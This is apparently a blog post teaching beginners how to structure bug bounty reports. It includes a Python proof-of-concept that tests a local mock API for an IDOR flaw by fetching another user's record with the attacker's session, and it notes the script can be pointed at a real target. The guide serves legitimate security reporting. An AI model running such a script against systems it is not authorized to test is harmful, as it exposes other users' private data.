Hi, bug hunters! Thanks for appreciating my previous article. I know there are many write-ups on how to write a good bug report, but the ones I have seen are pitched at an intermediate or advanced level and are hard for a beginner to follow. In this write-up we focus only on how to write a good, well-founded report for submission to bug bounty programs.
Before we start, let's look at the components of a report. A report can contain a Title, Description, Steps to reproduce, Proof of concept, Exploit code, Recommended solution and References. Each component plays a different role in a bug bounty submission. Including every component in every report is not good practice; which ones you need depends on the scenario and on the nature of the vulnerability.
Writing a good report is hard. When I started, I spent one to two hours writing a single report. After submitting 100+ bug reports on different platforms, I understood what the main components of a report are and how each one helps the security engineer spot the vulnerability. I'm going to describe them one by one. Let's start...
Title
The first impression is the last impression. The security engineer reads the title first and should be able to tell what the issue is from the title alone. State which functionality you were able to abuse or which protection you were able to bypass, and where. Keep it to one line.
Description
This component gives the details of the vulnerability. Explain it here: the paths and endpoints involved, the parameters you changed, and the error messages you got while testing. You can also attach the relevant HTTP requests and responses, or the vulnerable source code if you have it. Use your own test accounts and redact any real user data before attaching it.
Steps to reproduce
Write each step clearly and in order, so that someone who has never seen the issue can reproduce it from the steps alone. Include the exact URL, request, payload and account used at each step. That is what lets the security engineer triage quickly.
Proof of concept
This component is the visual record of the whole work. Record a short demonstration video or attach screenshots that show the request, the response and the effect (for example, another user's data on screen or an admin page you should not be able to reach). Make sure the screenshots and video match the steps to reproduce exactly.
Impact
Write about the real-life impact: how an attacker would benefit if the vulnerability were successfully exploited, and what kind of damage could result. Avoid theoretical impact; describe what you actually demonstrated.
Exploit code
If you are familiar with a scripting language, write one script that automates the whole process, so the triager can run it and see the result without repeating the steps by hand. Keep the target, the account used and the expected result clearly marked in the script.
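As an added example (this is not code from the original article), here is the shape an exploit script attached to a report can take: one target, one session, one request, and a clear vulnerable/not-vulnerable verdict with the evidence the report will quote. So that it runs offline, the script starts a mock API inside itself; the endpoint `/api/users/<id>`, the two accounts and the session tokens are constructed for illustration and do not describe any real program or target. The mock exhibits a hypothetical IDOR: it checks that a session exists but never checks that the session owns the requested record.

```python
"""
Hypothetical proof-of-concept script in the shape a report attachment
should have. The endpoint, accounts, session tokens and the mock server
below are constructed for this example; they describe no real target.
"""
import json
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed sample data: two accounts on the mock service.
USERS = {
    "1001": {"id": "1001", "email": "attacker@example.com"},
    "1002": {"id": "1002", "email": "victim@example.com"},
}
# Session tokens the mock accepts, mapped to the account that owns them.
SESSIONS = {"attacker-session": "1001", "victim-session": "1002"}


class MockAPI(BaseHTTPRequestHandler):
    """Mock API with a hypothetical IDOR: it requires a valid session but
    returns any user record regardless of which account the session owns."""

    def do_GET(self):
        token = self.headers.get("Cookie", "").replace("session=", "", 1)
        if token not in SESSIONS:
            self.send_error(401)
            return
        prefix = "/api/users/"
        if not self.path.startswith(prefix):
            self.send_error(404)
            return
        user = USERS.get(self.path[len(prefix):])
        if user is None:
            self.send_error(404)
            return
        body = json.dumps(user).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def check_idor(base_url, session, victim_id):
    """Request another user's record using only our own session.

    Returns (vulnerable, evidence). The evidence string is what the report
    quotes, so it names the status code and the data that came back."""
    req = urllib.request.Request(
        f"{base_url}/api/users/{victim_id}",
        headers={"Cookie": f"session={session}"},
    )
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            data = json.loads(resp.read())
    except urllib.error.HTTPError as err:  # must precede URLError (subclass)
        return False, f"HTTP {err.code}: access denied or not found"
    except urllib.error.URLError as err:
        return False, f"request failed: {err.reason}"
    if data.get("id") == victim_id:
        return True, f"HTTP 200 returned {data}"
    return False, f"HTTP 200 but record did not match: {data}"


def run_demo(session="attacker-session", victim_id="1002"):
    """Start the mock on a free local port, run the check, stop the mock."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), MockAPI)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    base = f"http://127.0.0.1:{server.server_address[1]}"
    try:
        return check_idor(base, session, victim_id)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    vulnerable, evidence = run_demo()
    print("Step: as attacker (id 1001), GET /api/users/1002 with own session")
    print("Result:", "VULNERABLE" if vulnerable else "not vulnerable")
    print("Evidence:", evidence)
```

Against a real target you would drop the mock, pass the program's URL and your own test-account session, and keep `check_idor` unchanged; the point is that the triager gets a single command whose output is the same evidence your steps to reproduce describe.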
Recommended solution
Suggest a fix: a check, a configuration change or another prevention method the company can implement to mitigate the issue.
References
You can find more sample reports here: Bug-report
A good report plays a key role in bug bounty work. Sometimes the company appreciates your report and awards a bonus; sometimes it pays only a small bounty for a similar issue that was reported badly. It depends on the quality of the report.